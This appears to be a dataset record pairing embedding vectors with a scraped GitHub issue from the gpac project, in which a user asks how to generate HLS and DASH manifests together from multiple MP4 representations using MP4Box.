0.015555170364677906, 0.02083885483443737, 0.010975975543260574, 0.013047181069850922, -0.03725350648164749, 0.0139771094545722, -0.001299786614254117, -0.015470631420612335, 0.008883636444807053, 0.007693046238273382, 0.014280040748417377, 0.02367091178894043, 0.007594417314976454, -0.01928897388279438, -0.004885647911578417, -0.008291863836348057, 0.03719714656472206, 0.006946285255253315, -0.006023401394486427, 0.01810542866587639, 0.018175877630710602, 0.015963774174451828, 0.006896970793604851, 0.007118885405361652, 0.009102028794586658, -0.006696190685033798, -0.005234370939433575, -0.021247461438179016, 0.0036316532641649246, 0.01607649400830269, 0.020599327981472015, 0.00012493714166339487, 0.010968931019306183, -0.00817914493381977, -0.030264951288700104, -0.03784527629613876, 0.0029870434664189816, 0.0065834722481667995, -0.0044347732327878475, 0.004917350132018328, -0.010299663990736008, -0.01630193181335926, 0.01764046400785446, -0.0035453529562801123, 0.003688012482598424, 0.013378291390836239, 0.0063721248880028725, 0.0030574926640838385, -0.031223058700561523, -0.0051885792054235935, -0.005917727947235107, 0.020754316821694374, -0.0010267961770296097, -0.009778340347111225, -0.010701224207878113, 0.005350612103939056, 0.013321932405233383, 0.006875835824757814, -0.038127075880765915, 0.007678956259042025, 0.006882880814373493, 0.017119141295552254, 0.014392759650945663, -0.0008132472285069525, -0.009764250367879868, 0.002913072006776929, 0.019683489575982094, 0.015541080385446548, -0.0047905417159199715, 0.029954973608255386, -0.022050580009818077, 0.022261928766965866, 0.014864768832921982, -0.016795074567198753, -0.010229215025901794, 0.02372726984322071, 0.0016467486275359988, 0.01370940264314413, 0.006041013635694981, -0.047370001673698425, -0.009686756879091263, 0.00490326015278697, -0.001543716760352254, -0.02169833518564701, -0.003945151809602976, 0.0010162288090214133, -0.020444341003894806, -0.01544245146214962, 0.013984153978526592, 0.012941506691277027, 0.011469120159745216, 0.01892263814806938, -0.009813564829528332, 0.007995977066457272, 0.014223681762814522, -0.00033375280327163637, -0.00022103417722973973, 0.002927161753177643, -0.0067138029262423515, -0.018147697672247887, 0.0038782251067459583, -0.0002952259383164346, -0.0074676088988780975, -0.024065425619482994, 0.024023156613111496, -0.01816178858280182, -0.030434029176831245, 0.012842877767980099, 0.019429871812462807, 0.020063914358615875, 0.013307842426002026, -0.013371246866881847, -0.007573282346129417, 0.007495788391679525, -0.003797208657488227, 0.02778514102101326, 0.020697956904768944, 0.0000937303775572218, 0.01955668069422245, 0.004910305142402649, 0.0013719969429075718, -0.026911571621894836, -0.00126192020252347, 0.012399048544466496, -0.02565757744014263, 0.0074676088988780975, 0.013871436007320881, 0.0031085682567209005, -0.003392126178368926, -0.00762964179739356, 0.021867413073778152, -0.016259660944342613, -0.007657821290194988, -0.013589639216661453, 0.015597439371049404, 0.006343944929540157, -0.00905975978821516, -0.013589639216661453, -0.010489877313375473, -0.002342433901503682, -0.010454651899635792, 0.014442073181271553, -0.024882636964321136, 0.003039880422875285, -0.02843327261507511, -0.004885647911578417, 0.013061270117759705, -0.0007700971327722073, 0.010581460781395435, -0.004772929009050131, -0.00982765480875969, 0.02202240191400051, 0.00017006862617563456, 0.004498177673667669, -0.009045669808983803, -0.004706002306193113, 0.0006098253652453423, -0.0138362105935812, 0.006037491373717785, 0.018499944359064102, 0.003969809040427208, 0.01253290195018053, 0.008080516010522842, -0.022952329367399216, 0.011032335460186005, -0.01613285206258297, 0.003080388531088829, 0.02298050932586193, 0.0021997743751853704, 0.004029690753668547, 0.007210469339042902, 0.008045291528105736, 0.004917350132018328, -0.0003989182587247342, -0.021388359367847443, 0.009249972179532051, 0.00798893254250288, 0.004653165582567453, -0.005163921974599361, 0.027376536279916763, 0.002937729237601161, 0.004469997715204954, -0.00022466671362053603, 0.0026735449209809303, -0.0036316532641649246, 0.007932573556900024, 0.011455030180513859, -0.021233370527625084, 0.009898103773593903, -0.006199524272233248, -0.006815954111516476, 0.0005913324421271682, 0.004801108967512846, -0.00820027943700552, -0.000022194230041350238, -0.006914583034813404, 0.0031208968721330166, 0.0005741604836657643, -0.0039028823375701904, 0.006044536363333464, 0.011215503327548504, 0.0010717075783759356, 0.015498810447752476, -0.022402826696634293, -0.002988804830238223, 0.014977486804127693, -0.006921628024429083, 0.012173611670732498, 0.0035576815716922283, 0.013019001111388206, 0.0002802554809022695, -0.002823249204084277, -0.008644109591841698, 0.01565379835665226, -0.0073901149444282055, -0.011595928110182285, -0.017668643966317177, -0.01806315965950489, -0.007425339426845312, 0.016921883448958397, -0.00836231280118227, 0.018260417506098747, 0.027531523257493973, -0.030067693442106247, 0.007594417314976454, 0.02206467092037201, -0.048750802874565125, 0.007326710503548384, -0.03516821190714836, -0.008045291528105736, 0.024769917130470276, -0.00734784547239542, -0.008432761766016483, -0.021064292639493942, -0.01317398902028799, -0.015569259412586689, 0.0004158700758125633, -0.0029095495119690895, -0.024164054542779922, -0.00991219375282526, 0.004927917383611202, 0.009531768970191479, -0.010024912655353546, -0.003464336507022381, -0.005209713708609343, -0.016921883448958397, 0.022416915744543076, -0.010687134228646755, 0.02307913824915886, 0.005727515090256929, -0.012666755355894566, 0.027291996404528618, -0.018049068748950958, 0.020387981086969376, 0.0007084541721269488, 0.017725003883242607, -0.0031807785853743553, 0.013293752446770668, 0.010954841040074825, -0.0008674050332047045, -0.009412004612386227, -0.009623352438211441, -0.005304820369929075, -0.01119436789304018, 0.023276396095752716, 0.014498433098196983, -0.000013697679605684243, -0.016583727672696114, 0.001549000502564013, 0.0010637820232659578, 0.020542969927191734, -0.010370112955570221, -0.0009942135075107217, 0.007235126569867134, 0.000794314022641629, -0.028334643691778183, 0.007242171559482813, 0.008221414871513844, -0.0006221539806574583, 0.01597786508500576, -0.02431904338300228, -0.024248594418168068, -0.01354736927896738, -0.0071717225946486, -0.008341178297996521, 0.005435151048004627, 0.010158766061067581, 0.0035576815716922283, 0.02591119334101677, 0.014681600965559483, 0.0046003288589417934, -0.01783772185444832, -0.014054602943360806, 0.009369735606014729, 0.003680967492982745, 0.001229337533004582, -0.011180278845131397, -0.024910815060138702, 0.014808408915996552, 0.005294252652674913, 0.012039758265018463, -0.023318665102124214, 0.03077218495309353, 0.006717325653880835, -0.014322309754788876, 0.012025668285787106, -0.029588637873530388, -0.007066048681735992, 0.0019408738007768989, -0.004265695344656706, 0.0024674811866134405, -0.012201790697872639, 0.008087561465799809, 0.017344579100608826, -0.015231103636324406, 0.01319512352347374, -0.010299663990736008, -0.006167822051793337, -0.000987168517895043, -0.0036386980209499598, -0.006999121978878975, -0.001445968635380268, 0.002356523647904396, -0.01913398690521717, 0.0065024555660784245, 0.0008634422556497157, 0.02981407567858696, -0.005216758698225021, 0.015893325209617615, -0.004322054795920849, -0.0022103418596088886, 0.010419427417218685, -0.022628264501690865, -0.006562337279319763, 0.015780607238411903, 0.016146942973136902, -0.001281293691135943, 0.013505100272595882, 0.016738716512918472, -0.015512900426983833, -0.005417538806796074, -0.0027263816446065903, 0.011292996816337109, 0.009468364529311657, -0.0038394781295210123, -0.0023019255604594946, -0.011694557033479214, 0.020810676738619804, 0.00527664041146636, 0.0009889297652989626, -0.012751294299960136, 0.010060137137770653, 0.016752805560827255, 0.016752805560827255, -0.013667132705450058, -0.012237015180289745, 0.004952574614435434, -0.00549151049926877, 0.008073471486568451, -0.012321554124355316, -0.004519312176853418, 0.002222670242190361, -0.005364702083170414, -0.001824632752686739, -0.0022755071986466646, 0.0015727770514786243, -0.019782118499279022, -0.003797208657488227, -0.005558437202125788, 0.01370235811918974, -0.03322381526231766, 0.011300042271614075, -0.0019162165699526668, 0.018344955518841743, 0.009757205843925476, -0.0065588150173425674, -0.001485596178099513, -0.01630193181335926, 0.015512900426983833, 0.03457643836736679, 0.003258272772654891, -0.0063721248880028725, 0.009996732696890831, -0.0046355533413589, -0.006343944929540157, -0.0036069960333406925, -0.0014908799203112721, 0.004639076068997383, 0.021726515144109726, 0.0003718393563758582, 0.009320421144366264, 0.01597786508500576, 0.010461697354912758, -0.0256434865295887, -0.021275639533996582, -0.010651909746229649, -0.0014609390636906028, 0.003110329620540142, 0.015076115727424622, -0.018077248707413673, 0.007319665513932705, 0.027700601145625114, 0.01153956912457943, -0.012976731173694134, 0.02013436332345009, -0.0031790174543857574, 0.004283307585865259, -0.02137426845729351, 0.005713425111025572, 0.01237086858600378, -0.007974842563271523, -0.020909303799271584, -0.017189590260386467, -0.01768273487687111, -0.004829288460314274, 0.014568882063031197, -0.015696069225668907, -0.016118763014674187, -0.014272995293140411, -0.0007643731660209596, -0.02506580390036106, 0.0034291117917746305, -0.023220036178827286, -0.006611651740968227, -0.015329732559621334, -0.012673799879848957, -0.0025925282388925552, 0.0042234258726239204, 0.01046874187886715, -0.016851434484124184, -0.00937678012996912, -0.010003778152167797, 0.009785385802388191, -0.0205711480230093, 0.022402826696634293, 0.005125174764543772, -0.019415782764554024, -0.010828033089637756, 0.01965530961751938, -0.020613418892025948, 0.014935217797756195, 0.016710536554455757, -0.02975771576166153, 0.01034193392843008, 0.018147697672247887, -0.0004077244084328413, 0.03415374457836151, -0.018711291253566742, -0.02120519056916237, -0.0012275762856006622, 0.0051322197541594505, -0.003885270096361637, -0.01079280860722065, 0.005495032761245966, -0.01795044168829918, 0.01833086647093296, 0.018260417506098747, -0.021289730444550514, 0.02319185622036457, -0.009778340347111225, 0.018204057589173317, 0.014357534237205982, 0.007083660922944546, 0.010954841040074825, 0.04497472941875458, 0.00754510285332799, 0.02175469510257244, 0.02152925729751587, -0.006629263982176781, 0.017513656988739967, -0.008947040885686874, -0.00041807160596363246, 0.0020764884538948536, -0.011863634921610355, -0.012765384279191494, 0.006002266891300678, 0.006051580887287855, 0.009729025885462761, 0.008228459395468235, -0.011342311277985573, 0.007111840881407261, 0.015780607238411903, 0.013653043657541275, -0.015907416120171547, 0.008925906382501125, 0.0016282557044178247, 0.013117630034685135, 0.0025185567792505026, -0.025051714852452278, -0.0044136387296020985, 0.0030627762898802757, 0.015386092476546764, 0.0104476073756814, -0.02164197526872158, 0.01880992017686367, -0.01408278290182352, -0.001113977050408721, -0.005843756254762411, 0.009087938815355301, -0.012293375097215176, -0.005519689992070198, -0.002842622809112072, -0.014110962860286236, -0.0028531900607049465, 0.009482454508543015, 0.0050547257997095585, 0.004984276834875345, 0.0073548899963498116, -0.011962263844907284, -0.0009378541726619005, -0.021656066179275513, -0.00036039139376953244, 0.01089848205447197, -0.013307842426002026, 0.0005301297642290592, 0.005963519681245089, -0.005685245618224144, 0.018767651170492172, -0.009545858018100262, 0.031166698783636093, -0.004818721208721399, -0.014568882063031197, -0.004505222663283348, 0.00131916010286659, -0.004219903610646725, -0.010961886495351791, -0.0005613915855064988, 0.04108593985438347, -0.030067693442106247, 0.011391625739634037, -0.009031579829752445, 0.016527367755770683, 0.015512900426983833, -0.03361833095550537, 0.008749783039093018, -0.012434273026883602, -0.0040367357432842255, -0.026897480711340904, -0.00745351891964674, 0.01025739498436451, 0.00972198136150837, -0.010172856040298939, -0.01009536162018776, 0.003860612865537405, -0.0016379425069317222, -0.02537577971816063, 0.004212858621031046, 0.015456541441380978, 0.007918483577668667, -0.002793308347463608, -0.008066426031291485, -0.010849167592823505, -0.007488743402063847, 0.024178145453333855, 0.02837691269814968, 0.007118885405361652, -0.008045291528105736, -0.0008585989126004279, 0.0037795964162796736, -0.008785007521510124, 0.011765005998313427, 0.019204435870051384, 0.010482831858098507, -0.01461115200072527, -0.009123163297772408, 0.009848789311945438, -0.012539946474134922, 0.013265573419630527, 0.026066182181239128, -0.012955596670508385, -0.02447403036057949, -0.001445968635380268, -0.013075360096991062, 0.022247837856411934, -0.011814320459961891, 0.011976353824138641, -0.022628264501690865, 0.02430495247244835, 0.016442829743027687, 0.011067559942603111, -0.008968175388872623, -0.005907160229980946, 0.004607373848557472, -0.002081772079691291, -0.005822621285915375, 0.010102407075464725, 0.01370940264314413, -0.016809165477752686, -0.009940373711287975, -0.037957996129989624, -0.0037443717010319233, -0.008968175388872623, -0.006724370177835226, -0.008017112500965595, 0.004022645764052868, -0.023487742990255356, -0.000611586612649262, -0.001472386997193098, 0.014878857880830765, 0.027601972222328186, -0.00517096696421504, -0.003624608274549246, -0.0283205546438694, 0.005061770789325237, 0.026756582781672478, 0.018838100135326385, -0.010764628648757935, 0.01838722638785839, 0.0005988177144899964, -0.013321932405233383, -0.006752550136297941, 0.01461115200072527, 0.009729025885462761, -0.005125174764543772, -0.0032318541780114174, 0.01445616316050291, -0.02195195108652115, -0.000595295219682157, -0.006055103614926338, 0.003931061830371618, -0.012314509600400925, 0.007020256947726011, 0.015188834629952908, -0.019035357981920242, 0.022910060361027718, 0.006794819608330727, 0.009510633535683155, -0.010757583193480968, -0.0006930434028618038, -0.012307465076446533, 0.003990943543612957, 0.020345712080597878, -0.010489877313375473, -0.016851434484124184, -0.01084212213754654, 0.010222170501947403, 0.002900743391364813, 0.0036774449981749058, -0.015329732559621334, 0.003751416690647602, -0.010687134228646755, -0.01785181276500225, -0.0028496677987277508, 0.003099762136116624, 0.004484087694436312, -0.00972198136150837, 0.004843378439545631, -0.009574037976562977, 0.0015340300742536783, -0.022318286821246147, -0.0034414404071867466, 0.0034044545609503984, 0.007932573556900024, -0.0007802242180332541, -0.007552147842943668, -0.019598951563239098, -0.0014177889097481966, -0.0141602773219347, 0.01164524257183075, 0.008482076227664948, -0.013934839516878128, 0.016809165477752686, 0.013899615034461021, 0.007974842563271523, -0.016696445643901825, -0.01961304061114788, 0.022036490961909294, -0.015047936700284481, 0.010067181661725044, -0.008587749674916267, 0.007967798039317131, -0.04429841786623001, -0.025023534893989563, -0.010496921837329865, 0.0069885547272861, 0.023896347731351852, -0.01354736927896738, -0.0001652252540225163, 0.01720367930829525, 0.03147667646408081, 0.025234881788492203, 0.002164549892768264, 0.02168424427509308, 0.004272740334272385, 0.005952952429652214, 0.0016467486275359988, 0.00504768081009388, -0.006861746311187744, 0.011919994838535786, 0.03381558880209923, 0.012659710831940174, 0.0005191221134737134, 0.01634420081973076, 0.0007692165672779083, 0.01810542866587639, 0.01469569094479084, 0.018739471212029457, 0.01116618886590004, 0.007995977066457272, 0.015231103636324406, 0.004825766198337078, 0.0016150465235114098, -0.017443206161260605, -0.0005992579972371459, -0.019472142681479454, 0.02784149907529354, -0.00891886092722416, 0.018175877630710602, 0.015146564692258835, -0.02495308592915535, 0.0053752693347632885, 0.007048436440527439, 0.00046628524432890117, -0.0073337554931640625, 0.019739849492907524, 0.013321932405233383, 0.00782689917832613, 0.020218903198838234, 0.016414649784564972, 0.0025432140100747347, 0.010539190843701363, 0.027827410027384758, 0.022994598373770714, 0.036351755261421204, -0.0014354012673720717, -0.006241793744266033, 0.020528879016637802, 0.006143164820969105, 0.023656820878386497, 0.02223374880850315, -0.01703460142016411, -0.0015595678705722094, -0.021289730444550514, -0.005952952429652214, 0.04193132743239403, -0.004565104376524687, 0.009926283732056618, -0.023530011996626854, -0.014794318936765194, 0.02281143143773079, -0.02533351071178913, 0.0143434451892972, -0.01370940264314413, -0.012434273026883602, 0.010165810585021973, -0.015879236161708832, 0.0011923516867682338, 0.01907762698829174, -0.02388225868344307, -0.00558309443295002, 0.0011386341648176312, -0.00510051753371954, -0.011257772333920002, -0.0027122918982058764, 0.009785385802388191, -0.02613663114607334, 0.02516443282365799, -0.022402826696634293, 0.005713425111025572, -0.01586514711380005, -0.01301195565611124, -0.00008156689727911726, -0.04412934184074402, -0.004772929009050131, 0.014822498895227909, 0.014399804174900055, 0.007657821290194988, 0.009609262458980083, -0.012659710831940174, 0.007164677605032921, -0.01662599667906761, -0.01580878719687462, 0.0038324331399053335, 0.013681222684681416, -0.03829615190625191, -0.015217014588415623, -0.004311487544327974, -0.0033516178373247385, -0.0038394781295210123, -0.014808408915996552, 0.0056746783666312695, -0.00991219375282526, -0.007059003692120314, -0.023318665102124214, -0.0019391125533729792, 0.004522834904491901, -0.018669022247195244, 0.0053541348315775394, -0.01586514711380005, -0.010024912655353546, -0.018246326595544815, 0.007678956259042025, 0.01603422500193119, 0.0033886036835610867, 0.025446228682994843, 0.02816556580364704, -0.008982265368103981, -0.0017938112141564488, -0.001767392735928297, -0.025305330753326416, 0.017400937154889107, 0.009588127955794334, -0.01100415550172329, 0.021360179409384727, -0.0025713935028761625, 0.011990443803369999, -0.020486610010266304, -0.00618543429300189, -0.00349427736364305, 0.00762964179739356, 0.0016432261327281594, -0.019190344959497452, 0.026531146839261055, -0.008165054954588413, 0.01950032263994217, -0.011257772333920002, -0.009144298732280731, 0.011229593306779861, 0.029363201931118965, 0.009242926724255085, -0.022614173591136932, 0.01917625591158867, -0.014223681762814522, -0.01046874187886715, -0.02110656164586544, -0.0077071357518434525, -0.032350245863199234, 0.0012628008844330907, 0.03319563344120979, -0.01944396272301674, -0.0005578691489063203, -0.004184679128229618, 0.03023677133023739, 0.008925906382501125, -0.003938106819987297, -0.00852434616535902, 0.004237515851855278, 0.012864013202488422, -0.014089828357100487, -0.0030891948845237494, -0.002689395798370242, 0.0012504722690209746, 0.027813320979475975, -0.019782118499279022, -0.01490703783929348, -0.016146942973136902, 0.00575921731069684, -0.017541835084557533, -0.0009369735489599407, -0.0036598327569663525, 0.013793941587209702, -0.03869066759943962, 0.024755828082561493, 0.0026224693283438683, -0.011602973565459251, 0.0006732295732945204, 0.007305576000362635, 0.010377158410847187, -0.01940169371664524, -0.00517096696421504, 0.001568373991176486, 0.0056958128698170185, 0.0029940884560346603, 0.007798719685524702, -0.011053469963371754, -0.01178614143282175, 0.030800363048911095, -0.022740982472896576, 0.04691912606358528, 0.0307158250361681, -0.012737204320728779, 0.0014318787725642323, -0.025798475369811058, -0.025403959676623344, 0.022473275661468506, -0.008517300710082054, -0.022698713466525078, -0.0031032846309244633, -0.013948929496109486, 0.010229215025901794, 0.0032406605314463377, -0.004089572466909885, 0.010954841040074825, -0.012117251753807068, -0.01865493133664131, 0.00079343345714733, -0.04567922279238701, 0.001812304137274623, 0.0011949934996664524, 0.018739471212029457, 0.010039002634584904, -0.0015058503486216068, -0.012871057726442814, 0.017330488190054893, -0.006576427258551121, 0.012110207229852676, 0.0026594549417495728, -0.022825520485639572, 0.006217136513441801, 0.00472713727504015, -0.01726003922522068, -0.0011668138904497027, -0.005974086932837963, 0.0028901759069412947, -0.000026322109988541342, 0.03029312938451767, -0.007981887087225914, -0.02617890015244484, -0.016541458666324615, -0.010356023907661438, 0.012723114341497421, -0.02565757744014263, 0.0019250226905569434, -0.005174489226192236, -0.0004088251735083759, -0.001043527852743864, 0.0073337554931640625, 0.0034678590018302202, 0.0025132731534540653, -0.0059388624504208565, -0.0003040320589207113, 0.008489121682941914, -0.0033498567063361406, -0.0008555167587473989, 0.011828410439193249, -0.01469569094479084, -0.022839611396193504, 0.00585080124437809, 0.0014362818328663707, 0.005755694583058357, 0.020275263115763664, 0.02500944398343563, -0.02447403036057949, 0.039197903126478195, 0.02051478996872902, 0.0024938995484262705, -0.005512645002454519, 0.013984153978526592, -0.005414016544818878, 0.0032318541780114174, 0.010158766061067581, 0.0010840361937880516, -0.006410871632397175, -0.03840887174010277, -0.004713047295808792, -0.008700468577444553, -0.011574793606996536, 0.006291108205914497, -0.017753183841705322, -0.008890680968761444, 0.0063721248880028725, -0.012004533782601357, -0.0425231009721756, -0.003136747982352972, -0.008749783039093018, -0.014209591783583164, -0.02078249678015709, -0.0010135869961231947, -0.00531538762152195, 0.028179656714200974, -0.009285196661949158, -0.00037558196345344186, 0.008242549374699593, 0.012849923223257065, 0.012089072726666927, 0.031110340729355812, 0.009073848836123943, 0.012307465076446533, -0.004617941100150347, 0.008531390689313412, -0.009869924746453762, -0.024769917130470276, 0.0013526234542950988, -0.009954463690519333, 0.0104476073756814, -0.02608027122914791, -0.006639831233769655, -0.01218065619468689, -0.008855456486344337, 0.0005622722092084587, -0.024009067565202713, 0.010644865222275257, -0.002393509494140744, 0.013575549237430096, 0.009264062158763409, 0.014780229888856411, 0.014054602943360806, 0.009891059249639511, -0.0073337554931640625, 0.006509500555694103, 0.030152231454849243, -0.011102784425020218, -0.004646120592951775, -0.001121021923609078, 0.006985031999647617, 0.03280111774802208, 0.013476920314133167, 0.008024157024919987, 0.015456541441380978, -0.023755449801683426, 0.0018263940000906587, 0.018626753240823746, 0.016851434484124184, 0.01714732125401497, -0.0005521451239474118, 0.02462901920080185, -0.007869169116020203, 0.019049447029829025, -0.021811053156852722, 0.04508744925260544, -0.0017110335174947977, 0.015217014588415623, -0.007953708060085773, 0.01827450655400753, -0.008235504850745201, -0.017612284049391747, 0.012751294299960136, -0.03435099869966507, 0.02319185622036457, 0.002280790824443102, 0.025995733216404915, -0.010856212116777897, -0.005917727947235107, -0.005745127331465483, 0.008073471486568451, -0.01218065619468689, -0.010539190843701363, 0.01869720220565796, -0.0129837766289711, -0.005889547988772392, -0.022994598373770714, 0.00025713935610838234, 0.025502588599920273, 0.002803875831887126, 0.005192101467400789, -0.017781361937522888, 0.01896490901708603, 0.01517474465072155, -0.01950032263994217, 0.0012900999281555414, 0.00980652030557394, -0.006551770027726889, 0.015456541441380978, 0.0020007556304335594, 0.010722358711063862, 0.0014996860409155488, 0.016386469826102257, -0.00037690289900638163, 0.009581083431839943, 0.016795074567198753, 0.005974086932837963, -0.0007348725921474397, 0.003247705288231373, -0.012497677467763424, -0.01892263814806938, -0.00982765480875969, 0.009672666899859905, 0.007087183650583029, 0.01757001504302025, -0.016203302890062332, 0.017429117113351822, -0.026897480711340904, -0.01699233241379261, 0.02382589876651764, 0.006618696730583906, -0.0019813820254057646, 0.018091339617967606, 0.008143920451402664, -0.00575921731069684, 0.003270601388067007, -0.01544245146214962, 0.032350245863199234 ]
1,683
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I'd like to generate a HLS .m3u8 at the same time as the DASH .mpd, but - as I'm new to streaming tech - have been overwhelmed by all the options available. Having read about the gpac 0.9.0 rearchitecture I gather this is possible, and have been exploring 1.0.1 on Debian testing - but can't see how to manage it. I've successfully used FFMPEG to create multiple scaled represenatations of a video (and a single separate audio file), and then MP4Box to create an .mpd file and adjust the video container information as needed - resulting in a working stream with single files for each representation (serving byte-ranges via Apache). I'm currently using gpac 0.5.2 on Debian 10 this with command: ```MP4Box -dash 5000 -frag 5000 -rap -profile onDemand -out film.mpd film_360.mp4 film_540.mp4 film_720.mp4 film_1080.mp4 film_audio.mp4``` It seems that, to get the .m3u8, I need to specify the *dasher* filter with the *dual* option, but haven't wrapped my head around how to do this. Any suggestions or examples?
How to generate both DASH & HLS for multiple representation files? [Help wanted]
https://api.github.com/repos/gpac/gpac/issues/1743/comments
2
2021-04-14T13:22:40
2021-04-14T14:05:11Z
https://github.com/gpac/gpac/issues/1743
857,894,718
1,743
false
This is a GitHub Issue repo:gpac owner:gpac Title : How to generate both DASH & HLS for multiple representation files? [Help wanted] Issue date: --- start body --- I'd like to generate a HLS .m3u8 at the same time as the DASH .mpd, but - as I'm new to streaming tech - have been overwhelmed by all the options available. Having read about the gpac 0.9.0 rearchitecture I gather this is possible, and have been exploring 1.0.1 on Debian testing - but can't see how to manage it. I've successfully used FFMPEG to create multiple scaled represenatations of a video (and a single separate audio file), and then MP4Box to create an .mpd file and adjust the video container information as needed - resulting in a working stream with single files for each representation (serving byte-ranges via Apache). I'm currently using gpac 0.5.2 on Debian 10 this with command: ```MP4Box -dash 5000 -frag 5000 -rap -profile onDemand -out film.mpd film_360.mp4 film_540.mp4 film_720.mp4 film_1080.mp4 film_audio.mp4``` It seems that, to get the .m3u8, I need to specify the *dasher* filter with the *dual* option, but haven't wrapped my head around how to do this. Any suggestions or examples? --- end body ---
1,212
[ -0.03168080002069473, 0.029445605352520943, -0.03337272256612778, 0.008257808163762093, -0.012363429181277752, 0.0031878710724413395, -0.003948458470404148, 0.053365308791399, -0.018409324809908867, 0.02180868573486805, 0.011765824630856514, -0.004734269808977842, 0.023360904306173325, -0.0039814431220293045, 0.01500996295362711, 0.00822676345705986, -0.023997314274311066, 0.02939903922379017, 0.004319050814956427, 0.02067556418478489, 0.026775788515806198, -0.014109675772488117, -0.03411778807640076, 0.03149453550577164, 0.00940645020455122, 0.02328329347074032, -0.02342299371957779, -0.0007528265123255551, -0.049174316227436066, 0.01957348920404911, 0.018223058432340622, 0.032844964414834976, -0.02531670220196247, -0.004707105923444033, -0.0009526747744530439, -0.00023174153466243297, 0.0374084934592247, 0.05696645751595497, -0.004365617409348488, -0.00946077797561884, 0.0027474286034703255, 0.017012326046824455, -0.020908398553729057, -0.0017297547310590744, -0.0010205843718722463, 0.015297124162316322, -0.012813572771847248, 0.0187973789870739, 0.011222547851502895, -0.03976786509156227, 0.01345774345099926, -0.01906125620007515, -0.011649408377707005, -0.048056717962026596, -0.037067003548145294, -0.07059494405984879, 0.03815355896949768, -0.006371861323714256, 0.005110682919621468, 0.03709804639220238, 0.029383515939116478, -0.013760427013039589, 0.0034051816910505295, 0.030889170244336128, 0.01769530400633812, 0.0016599048394709826, -0.020271988585591316, 0.03914697840809822, -0.013527593575417995, 0.020287510007619858, 0.01588696800172329, -0.0019460952607914805, 0.005685004405677319, 0.02716384269297123, 0.0047808364033699036, -0.04951580613851547, 0.03886757791042328, 0.015529956668615341, 0.011222547851502895, 0.04001621901988983, -0.04908118396997452, -0.016174128279089928, -0.05606617033481598, 0.0012922227615490556, -0.011564035899937153, 0.015025485306978226, -0.05370679870247841, -0.06059865280985832, 0.0035487620625644922, -0.008203480392694473, 0.003731147851794958, -0.0031975724268704653, 0.06090909615159035, -0.008832129649817944, 0.011447619646787643, 0.03216198831796646, -0.0015182647621259093, 0.0016569944564253092, -0.03613567352294922, -0.05032295733690262, -0.04575943201780319, 0.019247522577643394, -0.009553911164402962, -0.0049088941887021065, 0.031587667763233185, 0.007931842468678951, 0.03787415847182274, -0.02531670220196247, -0.03362107649445534, 0.0673663318157196, 0.035825226455926895, 0.017509037628769875, 0.010260171256959438, 0.012495367787778378, -0.037812069058418274, 0.00402412936091423, -0.04327588155865669, -0.056407660245895386, 0.006783199496567249, -0.01146314200013876, 0.023640304803848267, 0.011067325249314308, -0.031711846590042114, 0.010167038068175316, -0.03902279958128929, 0.03177393600344658, -0.02618594467639923, 0.011168220080435276, 0.014645191840827465, -0.0015551300020888448, -0.036818649619817734, -0.023640304803848267, -0.013737143017351627, -0.03092021308839321, 0.013302521780133247, 0.008785562589764595, -0.022383006289601326, 0.01955796591937542, -0.02256927266716957, 0.017260681837797165, -0.013116255402565002, -0.0491122268140316, 0.04209619387984276, -0.031230658292770386, 0.000004229192200000398, -0.01769530400633812, 0.038712356239557266, 0.02679130993783474, -0.03802938014268875, 0.013162822462618351, -0.011804630048573017, 0.01034554373472929, 0.00539396284148097, -0.012836855836212635, 0.004532481078058481, 0.03324854373931885, -0.02967843785881996, -0.015529956668615341, 0.02368687093257904, 0.03001992590725422, 0.004551883786916733, -0.012627306394279003, -0.0015386376762762666, 0.003546821651980281, 0.00822676345705986, -0.010741359554231167, 0.0011282695923000574, 0.01721411570906639, -0.0266826543956995, 0.009670328348875046, -0.004645016975700855, -0.011106130667030811, 0.01034554373472929, 0.014187286607921124, -0.05771152302622795, -0.03480076417326927, 0.03967473283410072, 0.031727369874715805, 0.010741359554231167, -0.0065814112313091755, -0.0602882094681263, -0.03256556764245033, 0.026123855262994766, -0.008195719681680202, 0.01340341567993164, -0.01002733875066042, 0.041568439453840256, -0.03598044812679291, 0.0008542058640159667, -0.026496388018131256, 0.010555093176662922, 0.056656014174222946, 0.009142572991549969, 0.021886296570301056, 0.04619405418634415, -0.02331433817744255, -0.02930590510368347, -0.0351112075150013, 0.002308926545083523, 0.018781857565045357, -0.028498752042651176, -0.04315170273184776, 0.0011020759120583534, -0.008948545902967453, -0.03728431463241577, 0.027582941576838493, -0.0052659050561487675, 0.030314847826957703, 0.04908118396997452, -0.03489389643073082, -0.014427880756556988, -0.04023353010416031, 0.010004054754972458, 0.0099730109795928, -0.01632934994995594, 0.006732752546668053, 0.0071052853018045425, 0.01532816793769598, -0.010058382526040077, -0.019045734778046608, 0.011804630048573017, -0.0073458789847791195, -0.009010634385049343, -0.014171765185892582, -0.02865397371351719, -0.017866047099232674, 0.014373552985489368, 0.011424335651099682, -0.011952091008424759, 0.01708993688225746, 0.008731234818696976, 0.010950908996164799, -0.00012611784040927887, 0.012673872523009777, -0.0028289202600717545, 0.011983134783804417, -0.006426189094781876, -0.013108494691550732, 0.004590689204633236, 0.019635576754808426, -0.031184092164039612, -0.002367134904488921, 0.0031936918385326862, 0.019651100039482117, -0.005425007548183203, 0.014815935865044594, 0.002662056591361761, 0.020116765052080154, -0.00971689447760582, -0.02379552647471428, 0.014730563387274742, -0.004128904081881046, 0.008187958039343357, -0.024773424491286278, -0.03675656020641327, 0.019589010626077652, 0.006942301988601685, 0.00023489448358304799, 0.00535903824493289, -0.06829766184091568, 0.004299648106098175, -0.0058945538476109505, -0.017229637131094933, -0.012572978623211384, 0.010415392927825451, -0.042561862617731094, 0.010236888192594051, -0.002122660167515278, -0.003267422318458557, -0.01632934994995594, -0.01969766616821289, -0.04190992936491966, -0.02179316245019436, 0.03473867475986481, 0.010997476056218147, -0.029352473095059395, 0.011432097293436527, -0.02093944139778614, 0.04377259314060211, -0.008071541786193848, -0.002619370585307479, 0.034459274262189865, 0.018254103139042854, 0.02454059198498726, -0.04957789182662964, 0.0005568587803281844, -0.002580564934760332, -0.004105620551854372, -0.052775464951992035, 0.024230146780610085, 0.027970997616648674, 0.026341166347265244, 0.002186689293012023, 0.00011477935913717374, 0.0331554114818573, 0.012138357385993004, 0.014288181439042091, 0.017664259299635887, 0.05035400390625, 0.008242285810410976, -0.03151005879044533, 0.029616350308060646, 0.04650449752807617, -0.020023632794618607, -0.03467658534646034, -0.0038068185094743967, 